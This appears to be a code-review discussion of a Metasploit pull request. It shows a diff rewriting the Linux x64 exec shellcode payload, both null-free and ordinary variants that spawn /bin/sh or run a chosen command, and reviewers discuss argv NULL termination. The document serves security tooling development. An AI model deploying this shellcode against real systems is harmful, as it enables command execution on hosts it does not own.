modules/payloads/singles/linux/x64/exec.rb

```diff
@@ -5,45 +5,170 @@
-      call                           + # callq  2d <run>
-      cmd                            + # .ascii "cmd\0"
-      "\x56"                         + # push   %rsi
-      "\x57"                         + # push   %rdi
-      "\x48\x89\xe6"                 + # mov    %rsp,%rsi
-      "\x0f\x05"                       # syscall
+    cmd             = datastore['CMD'] || ''
+    nullfreeversion = datastore['NullFreeVersion']
+
+    if cmd.empty?
+      #
+      # Builds the exec payload which executes a /bin/sh shell.
+      # execve("/bin/sh", NULL, NULL)
+      #
+      if nullfreeversion
+        # 22 bytes (null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f2f
+            cdq                     ; edx = NULL
+
+            push rdx
+            push rax
+            push rsp
+            pop rdi                 ; "//bin/sh"
+
+            push rdx
+            pop rsi                 ; NULL
+
+            push 0x3b
+            pop rax
+
+            syscall                 ; execve("//bin/sh", NULL, NULL)
+        EOS
+
+      else
+        # 21 bytes (not null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f
+            cdq                     ; edx = NULL
+
+            push rax
+            push rsp
+            pop rdi                 ; "/bin/sh"
+
+            push rdx
+            pop rsi                 ; NULL
+
+            push 0x3b
+            pop rax
+
+            syscall                 ; execve("/bin/sh", NULL, NULL)
+        EOS
+      end
+    else
+      #
+      # Dynamically builds the exec payload based on the user's options.
+      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
+      #
+      pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw)
+
+      if nullfreeversion
+        if cmd.length > 0xffff
+          raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller()
+        end
+        if cmd.length <= 0xff # 255
+          breg = "bl"
+        else
+          breg = "bx"
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += " "
+          end
+        end
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
+
+        # 48 bytes without cmd (null-free)
+        payload = <<-EOS
+            mov rax, 0x68732f6e69622f2f
+            cdq                     ; edx = NULL
+
+            jmp tocall              ; jmp/call/pop cmd address
+          afterjmp:
+            pop rbp                 ; *CMD*
+
+            push rdx
+            pop rbx
+            #{mov_cmd_len_to_breg}  ; mov (byte/word) (bl/bx), cmd.length
+            mov [rbp + rbx], dl     ; NUL '\0' terminate cmd
+
+            push rdx
+            #{pushw_c_opt}
+            push rsp
+            pop rsi                 ; "-c"
+
+            push rdx
+            push rax
+            push rsp
+            pop rdi                 ; "//bin/sh"
+
+            push rdx                ; NULL
```

Comment:
Is this needed here? You terminate the command earlier at line 114, so this seems like a double NULL termination? Just an idea to save some space.

Reply:
Line 126 is needed because we are building the `["//bin/sh", "-c", "*CMD*"]` into the stack. As we can see in the `execve(2)` manual, _The argv array must be terminated by a NULL pointer_.

Line 114 `mov [rbp + rbx], dl` only terminates the CMD string with a single NUL byte. Nevertheless its stack location isn't adjacent to `argv` array location.

Let's see.

```
0x7fffffffe2c6:	0x00007fffffffe2e6 <- "//bin/sh"  0x00007fffffffe2f6 <- "-c"
0x7fffffffe2d6:	0x00000000004000a8 <- "id"        0x0000000000000000 <- push RDX (argv terminate NULL pointer)
0x7fffffffe2e6:	0x68732f6e69622f2f                0x0000000000000000
```

![image](https://user-images.githubusercontent.com/3372117/114481649-5b7d1800-9bdb-11eb-9b6c-9bb8d0caa95b.png)

Reply:
Alright sounds good wasn't aware of that requirement. I'll mark this and the other PR as resolved and get this tested and landed so long.